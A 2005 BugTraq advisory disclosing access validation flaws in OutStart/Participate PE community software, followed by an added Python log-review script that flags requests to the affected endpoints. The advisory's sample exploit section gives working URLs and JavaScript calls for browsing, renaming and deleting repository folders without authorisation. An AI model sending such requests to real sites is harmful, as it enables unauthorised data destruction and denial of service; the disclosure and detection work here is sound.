BugTraq
PE Multiple Remote Access Validation Vulnerabilities (Participate Systems Inc. / Outstart Inc.) Mar 08 2005 07:30AM
Altrus Wollesen (root honour ca)


--------------------------------------------------------
- Multiple Remote Access Validation Vulnerabilities
- With PE (community software)
--------------------------------------------------------
(Altrus::security.honour.ca)

Program name: PE

Versions affected: <unknown>

Vendor(s): Outstart Inc.
Participate Systems Inc.

Vendor Notification Date: 23 FEB 2005

Risk: Moderately Serious
Impact: Denial of Service, File Upload

Vendor Homepages: http://www.outstart.com
http://www.participate.com

---------------------------------------------------------
- Description
---------------------------------------------------------

PE is a proprietary Java-based community that mimics the
functionality provided by existing open-source software.
It facilitates community forums, document libraries,
message boards, user interaction and a user management
infrastructure.

From vendor site:

Available as either a hosted or installed solution,
OutStart Participate is improving the collaboration and
knowledge-sharing capabilities of many world-class
companies, including GE Healthcare, Caremark, palmOne,
Logitech, McGraw-Hill and Tivo. OutStart Participate
combines three different systems into one powerful
knowledge-sharing platform.

---------------------------------------------------------
- Discussion
---------------------------------------------------------

The software is affected by an Access Validation Error
that could allow a malicious user to rename or delete
critical directory objects. This could result in a denial
of service of all library, forum, and/or specialized
content until the directory objects were restored or
renamed appropriately.

The Vendor has been notified of this issue, and has
developed a patch. Sites and persons using the software
are advised to install the patch - available from the
vendor.

---------------------------------------------------------
- Sample Exploit Code
---------------------------------------------------------

http://www.targetsite.com/pe/repository/displaynavigator.jsp?rootFolder=101
-Allows an attacker to browse a limited directory tree (in this case, the action directory). Changing to "rootFolder=105" allows the document library to be browsed.

http://www.targetsite.com/pe/repository/include/renamepopup.jsp?selectedObject=101
-Allows an attacker to rename the selected object ID (in this case, the action directory).

http://www.targetsite.com/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101
-Sets the object CSV for the delete navigator.

The following JavaScript commands might also be used to
call functions otherwise unavailable to the user:

showDeleteView()
showWebFolderView()
showLibraryView()
showMyLibraryView()
singleSelectObject(objid)
processRadioSelection(radio, objid)
processCheckboxSelection(chkbox, objid)
singleSelectObject(objid)
addToSelectedObjects(objid)
removeFromSelectedObjects(objid)

---------------------------------------------------------
- Solutions
---------------------------------------------------------

The vendor has provided a patch. Its effectiveness is
not confirmed, nor is its distribution.

---------------------------------------------------------
- References
---------------------------------------------------------

Authoritative and updated copies of this vulnerability can
be found at:

http://security.honour.ca

---------------------------------------------------------
- Credits
---------------------------------------------------------

Discovered by: Altrus [root (at) honour (dot) ca]
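
Added example (not part of the original advisory or the vendor's code): a log review that surfaces requests to the three repository endpoints listed under Sample Exploit Code, grouped by client and action. It assumes access logs in common/combined format; the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Endpoints and parameters named in the advisory -> (action, object-id parameter).
WATCHED = {
    "/pe/repository/displaynavigator.jsp": ("browse", "rootFolder"),
    "/pe/repository/include/renamepopup.jsp": ("rename", "selectedObject"),
    "/pe/repository/displaydeletenavigator.jsp": ("delete", "selectedObjectsCSV"),
}

# Assumption: common/combined access log layout (host ident user [time] "request" status ...).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_hits(lines):
    """Yield one dict per request that reaches a watched endpoint with its object parameter."""
    for line in lines:
        m = LINE_RE.match(line)
        url = urlsplit(m["target"]) if m else None
        watched = WATCHED.get(url.path.lower()) if url else None
        if watched is None:
            continue
        action, param = watched
        # Parameter names are compared case-insensitively; CSV values are split into ids.
        query = {k.lower(): v for k, v in parse_qs(url.query).items()}
        ids = [i for v in query.get(param.lower(), []) for i in v.split(",") if i]
        if ids:
            yield {"ip": m["ip"], "user": m["user"], "ts": m["ts"],
                   "action": action, "ids": ids, "status": int(m["status"])}

def summarize(lines):
    """Group object ids by (client, user, action) so rename/delete activity stands out."""
    out = defaultdict(set)
    for h in find_hits(lines):
        out[(h["ip"], h["user"], h["action"])].update(h["ids"])
    return dict(out)

# Constructed sample log lines (not from a real server).
SAMPLE = [
    '203.0.113.7 - guest [08/Mar/2005:07:31:02 -0500] "GET /pe/repository/displaynavigator.jsp?rootFolder=105 HTTP/1.1" 200 5120',
    '203.0.113.7 - guest [08/Mar/2005:07:31:40 -0500] "GET /pe/repository/include/renamepopup.jsp?selectedObject=101 HTTP/1.1" 200 2048',
    '203.0.113.7 - guest [08/Mar/2005:07:32:05 -0500] "GET /pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101%2C105 HTTP/1.1" 200 3072',
    '198.51.100.4 - alice [08/Mar/2005:07:33:00 -0500] "GET /pe/forum/index.jsp HTTP/1.1" 200 900',
]
if __name__ == "__main__":
    print({k: sorted(v) for k, v in summarize(SAMPLE).items()})
```

A hit only shows that the endpoint was requested with an object ID; compare the user and IDs against who is entitled to manage those folders.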
